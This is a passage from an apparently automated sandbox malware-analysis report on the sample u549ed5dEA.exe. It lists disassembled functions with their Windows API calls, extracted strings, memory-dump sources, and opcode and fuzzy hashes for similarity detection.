                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                              • String ID:
                                              • API String ID: 336800556-0
                                              • Opcode ID: 288b872a58d8f35b2b1b28d3203519b4aa4bc141e1d7dc99bbfa87667fe1b1e4
                                              • Instruction ID: d8cd8ee91e4d1fad255e2f74da9ee4e5451ff9e9492376b584130330afb17d42
                                              • Opcode Fuzzy Hash: 288b872a58d8f35b2b1b28d3203519b4aa4bc141e1d7dc99bbfa87667fe1b1e4
                                              • Instruction Fuzzy Hash: E801F277601210BF33252AB7EC8CF7F7A6DDEC6BA1328012CF908D2511DA60CD02A1B0
                                              Function 00CC0089 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00CB535E,00CB535E,?,00CC01D8,00CC0451,?,?,00CB6C16,?,?,?,?,?,00CB5269,00CB535E,?), ref: 00CC008E
                                              • _free.LIBCMT ref: 00CC00C3
                                              • _free.LIBCMT ref: 00CC00EA
                                              • SetLastError.KERNEL32(00000000,?,00CB535E), ref: 00CC00F7
                                              • SetLastError.KERNEL32(00000000,?,00CB535E), ref: 00CC0100
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free
                                              • String ID:
                                              • API String ID: 3170660625-0
                                              • Opcode ID: a69401fd18c800b3ad72e5aaed1e7151d963b43dab81a1f2554451f9f871287e
                                              • Instruction ID: 7916fe6df3d385f7aa272ecf22b2bcabd9237f24e0bb874cf968ea5bf2f8d3bc
                                              • Opcode Fuzzy Hash: a69401fd18c800b3ad72e5aaed1e7151d963b43dab81a1f2554451f9f871287e
                                              • Instruction Fuzzy Hash: 51012D36245700E783226775DD86F2F235EDFC1371737002DF519A21A2EE708D02A220
                                              Function 00CC34AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00CC34C7
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CC34D9
                                              • _free.LIBCMT ref: 00CC34EB
                                              • _free.LIBCMT ref: 00CC34FD
                                              • _free.LIBCMT ref: 00CC350F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 39e452eb36c9442aad6d347c7c8b417c1c19408ebc294d75672d611cde8c97a2
                                              • Instruction ID: a50adb5c27bf09136379646308e20c732cd1977541e323cbced21c3ff180dc4c
                                              • Opcode Fuzzy Hash: 39e452eb36c9442aad6d347c7c8b417c1c19408ebc294d75672d611cde8c97a2
                                              • Instruction Fuzzy Hash: AFF06D36519280EB8725EB68F882F1A77D9EB4031036D884EF018E7D50CBB0FE80CB60
                                              Function 00CBF7C0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00CBF7DE
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CBF7F0
                                              • _free.LIBCMT ref: 00CBF803
                                              • _free.LIBCMT ref: 00CBF814
                                              • _free.LIBCMT ref: 00CBF825
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: e7ca7748f8e1e97f12679d6eefc71bd8cdc831e13cc3dfa58dfef8422502a2b0
                                              • Instruction ID: 4e51cbb31792687e2e9530a6c6709d466c50f04a3961b706c1f1873b0e832e09
                                              • Opcode Fuzzy Hash: e7ca7748f8e1e97f12679d6eefc71bd8cdc831e13cc3dfa58dfef8422502a2b0
                                              • Instruction Fuzzy Hash: 18F05E788313E0CB9B11AF24FC82B4C7BA5F72476431A019FF01AAA771CB711942DB81
                                              Function 00CB2F8D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 350COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 00CB31A4
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: .lnk$0$lnk
                                              • API String ID: 176396367-906397761
                                              • Opcode ID: 8412cb67cbcfff992a506341cb1cf10b425a72070d970a0b53f6ff2bf2332992
                                              • Instruction ID: 307bf87b2e899b7541bb8952518defb8cc4f5e28f6ff3023d6ac95274cf56b77
                                              • Opcode Fuzzy Hash: 8412cb67cbcfff992a506341cb1cf10b425a72070d970a0b53f6ff2bf2332992
                                              • Instruction Fuzzy Hash: FCE11871D002599EDF24DBA4CC89BDDB7B8AF09304F5405AAE409B7151DB349B88DF61
                                              Function 00CB2B26 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 291COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00CB2B66
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                                • Part of subcall function 00CA0BF3: _wcslen.LIBCMT ref: 00CA0C03
                                              • EndDialog.USER32(?,00000001), ref: 00CB2EDA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen$DialogPathTemp
                                              • String ID: $@set:user
                                              • API String ID: 2172748170-1503366402
                                              • Opcode ID: 0f936d668b8f0384d7abfe8d780e857614a6ec6099cca4e4df59741f8e3e8ae6
                                              • Instruction ID: 8cbdc7fedb523994b3bf80fc5982c27948c9fcad449c82281c8d0b7cb2bae8fe
                                              • Opcode Fuzzy Hash: 0f936d668b8f0384d7abfe8d780e857614a6ec6099cca4e4df59741f8e3e8ae6
                                              • Instruction Fuzzy Hash: 96C14C71C012999EDF20EBA4CC49BEDBBB4AF15304F54009AE849B7292DB705F89DF61
                                              Function 00CB1F82 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA1309: __EH_prolog3.LIBCMT ref: 00CA1310
                                                • Part of subcall function 00CA1309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00CA17FB,?,?,\\?\,9CAA5719,?,?,?,00000000,00CCA279,000000FF), ref: 00CA1319
                                                • Part of subcall function 00CA1AD1: __EH_prolog3_GS.LIBCMT ref: 00CA1AD8
                                                • Part of subcall function 00C9F763: __EH_prolog3_GS.LIBCMT ref: 00C9F76A
                                                • Part of subcall function 00C9F58B: __EH_prolog3_GS.LIBCMT ref: 00C9F592
                                                • Part of subcall function 00C9F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00C9A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00C9F5A8
                                                • Part of subcall function 00C9F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9F5EB
                                              • SHFileOperationW.SHELL32(?,?,?,?,00000000), ref: 00CB2137
                                              • MoveFileW.KERNEL32(?,?), ref: 00CB22BE
                                              • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00CB22D8
                                                • Part of subcall function 00CA14CC: __EH_prolog3_GS.LIBCMT ref: 00CA14D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                              • String ID: .tmp
                                              • API String ID: 1688541384-2986845003
                                              • Opcode ID: d6083aefd8416623b78fdc08ee28c7e50f590a36b9f1686a73cd75b78e2ec987
                                              • Instruction ID: 60b8d21a6ee81fdd7d3e01e9a71a6d7a212131903224cc48df9ab418c26d5c4f
                                              • Opcode Fuzzy Hash: d6083aefd8416623b78fdc08ee28c7e50f590a36b9f1686a73cd75b78e2ec987
                                              • Instruction Fuzzy Hash: 1BC1D1718002699ADF25DFA4CC85BDDBBB8BF09304F5441EAE849A3251DB349B89DF21
                                              Function 00C9A300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9A307
                                              • GetLastError.KERNEL32(00000054,?,?,?,?,?,00C9D303,?,?,?,?,?,?,?,9CAA5719,00000049), ref: 00C9A427
                                                • Part of subcall function 00C9AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C9AC2E
                                                • Part of subcall function 00C9AC11: GetLastError.KERNEL32 ref: 00C9AC72
                                                • Part of subcall function 00C9AC11: CloseHandle.KERNEL32(?), ref: 00C9AC81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                              • API String ID: 2235100918-639343689
                                              • Opcode ID: 624603faa3cfb0c912e8f66c0cbfab1fd15fb095c859327aac3fa71ee53f8fa3
                                              • Instruction ID: 5b4d7de383ca763b5d1c9d8aa4c965538418407daf11d3a973b52edb02fe7cb7
                                              • Opcode Fuzzy Hash: 624603faa3cfb0c912e8f66c0cbfab1fd15fb095c859327aac3fa71ee53f8fa3
                                              • Instruction Fuzzy Hash: 2541A071E10208AFDF14EBA8E889BED77B4AF09314F04502EF501F7241DBB49A44DB62
                                              Function 00CBEE2A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\u549ed5dEA.exe,00000104), ref: 00CBEE6A
                                              • _free.LIBCMT ref: 00CBEF35
                                              • _free.LIBCMT ref: 00CBEF3F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\u549ed5dEA.exe
                                              • API String ID: 2506810119-3887152593
                                              • Opcode ID: a621bddc54a0799008faf34263d7504f32c98323b66cd9124a146b906c4540e5
                                              • Instruction ID: 4ada34be98bda164df75f9f0d8e08de0f6b0f9bd299679ccdd212f715f011fa7
                                              • Opcode Fuzzy Hash: a621bddc54a0799008faf34263d7504f32c98323b66cd9124a146b906c4540e5
                                              • Instruction Fuzzy Hash: E9316D71A04298AFDB21DB99DC81EEEBBFCEB95B10F1440AAF4049B211D7709E40DB91
                                              Function 00CB9E56 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CB9E7B
                                              • _abort.LIBCMT ref: 00CB9F86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: EncodePointer_abort
                                              • String ID: MOC$RCC
                                              • API String ID: 948111806-2084237596
                                              • Opcode ID: dab3aee01029135c38f3e43407f77890b0c5a76143c46eca86b7fc62a16abb1f
                                              • Instruction ID: db258a1297ce42ae7c92e79debb62533d3eacf5d5558b9774f58267b78be67c9
                                              • Opcode Fuzzy Hash: dab3aee01029135c38f3e43407f77890b0c5a76143c46eca86b7fc62a16abb1f
                                              • Instruction Fuzzy Hash: D2416971900209EFCF15DF98CD81AEEBBB5FF48314F188199FA14A7261D335AA51DB50
                                              Function 00CA338E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              • __fprintf_l.LIBCMT ref: 00CA340E
                                              • _strncpy.LIBCMT ref: 00CA3459
                                                • Part of subcall function 00CA89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00CDE088,?,00000007,00CA33E2,?,?,00000050,9CAA5719), ref: 00CA8A0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                              • String ID: $%s$@%s
                                              • API String ID: 562999700-834177443
                                              • Opcode ID: 12c70323da07b55ca902f329593029418f15f4fadb104cc995b1b3e14e97d6bd
                                              • Instruction ID: 2d519e38db16c9b0983428206db256309947551aea164ea243318396214c4896
                                              • Opcode Fuzzy Hash: 12c70323da07b55ca902f329593029418f15f4fadb104cc995b1b3e14e97d6bd
                                              • Instruction Fuzzy Hash: 0721917260074EABDB10DEA8CC85FEE7BA8FB0A304F040526FA15D7191D734EA15CB60
                                              Function 00CAF8F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAF8F7
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CAF99F
                                              • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00CAF9E1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemText$DialogH_prolog3_Window
                                              • String ID: ASKNEXTVOL
                                              • API String ID: 2321058237-3402441367
                                              • Opcode ID: b598fd1d30c091baba56f502676292d347da7a981f1ea9b88e044c6688a24333
                                              • Instruction ID: 0f5770ee6f054dba147be40732e846ae263e4ff8d5672b27f5b07fd3e85f84a5
                                              • Opcode Fuzzy Hash: b598fd1d30c091baba56f502676292d347da7a981f1ea9b88e044c6688a24333
                                              • Instruction Fuzzy Hash: C7215E31640246BFDB14EFB4CC8AFAE37A8AB07349F140028F9519B1E5C7719A06DB25
                                              Function 00CA7445 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000,00CAABB6,?), ref: 00CA7484
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000), ref: 00CA748E
                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C9FEBD,00000008,00000004,00CA2D42,?,?,?,?,00000000), ref: 00CA749E
                                              Strings
                                              • Thread pool initialization failed., xrefs: 00CA74B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                              • String ID: Thread pool initialization failed.
                                              • API String ID: 3340455307-2182114853
                                              • Opcode ID: b7290801547145c7da1d51669f4fdef7d075eae5d9687fe30855efbc5027a949
                                              • Instruction ID: b05fa7ddacee422476985ead61ad1e857d06e25770f1223d8bc268f11b3de432
                                              • Opcode Fuzzy Hash: b7290801547145c7da1d51669f4fdef7d075eae5d9687fe30855efbc5027a949
                                              • Instruction Fuzzy Hash: 3C1173B1644709AFD3215F6ADCC4AA7FFDCFB59758F10492EF1DAC2200D6B169808B64
                                              Function 00CB406A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                              • API String ID: 0-56093855
                                              • Opcode ID: cb628a074b420350cbfdba24e45c7a3a792df8fe03aa5b643f63cc0f35695ddc
                                              • Instruction ID: d47b72689eb0a2765fd4cce872359334fbb510f3b313ef096d8aa5cc915dd8fa
                                              • Opcode Fuzzy Hash: cb628a074b420350cbfdba24e45c7a3a792df8fe03aa5b643f63cc0f35695ddc
                                              • Instruction Fuzzy Hash: 78118270748384AFD724AF19ED84B5A7BE8E749395F04442AFA41CB361C2719844EF61
                                              Function 00CBA892 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CBA843,00000000,?,00CE6150,?,?,?,00CBA9E6,00000004,InitializeCriticalSectionEx,00CCF7F4,InitializeCriticalSectionEx), ref: 00CBA89F
                                              • GetLastError.KERNEL32(?,00CBA843,00000000,?,00CE6150,?,?,?,00CBA9E6,00000004,InitializeCriticalSectionEx,00CCF7F4,InitializeCriticalSectionEx,00000000,?,00CBA79D), ref: 00CBA8A9
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CBA8D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 0da01f723e47f817cfd9ad1369f939af1f35ccc14e8082344a11fc03482d84c5
                                              • Instruction ID: 3aabf386fea2ee2d66d832645e63106f55673fffd557f81f7de03faa5b1423db
                                              • Opcode Fuzzy Hash: 0da01f723e47f817cfd9ad1369f939af1f35ccc14e8082344a11fc03482d84c5
                                              • Instruction Fuzzy Hash: 25E04830280205B7DF101FA0EC46F5C3A599B10B51F100034F94EE4CE0D762991296D5
                                              Function 00CC07EA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
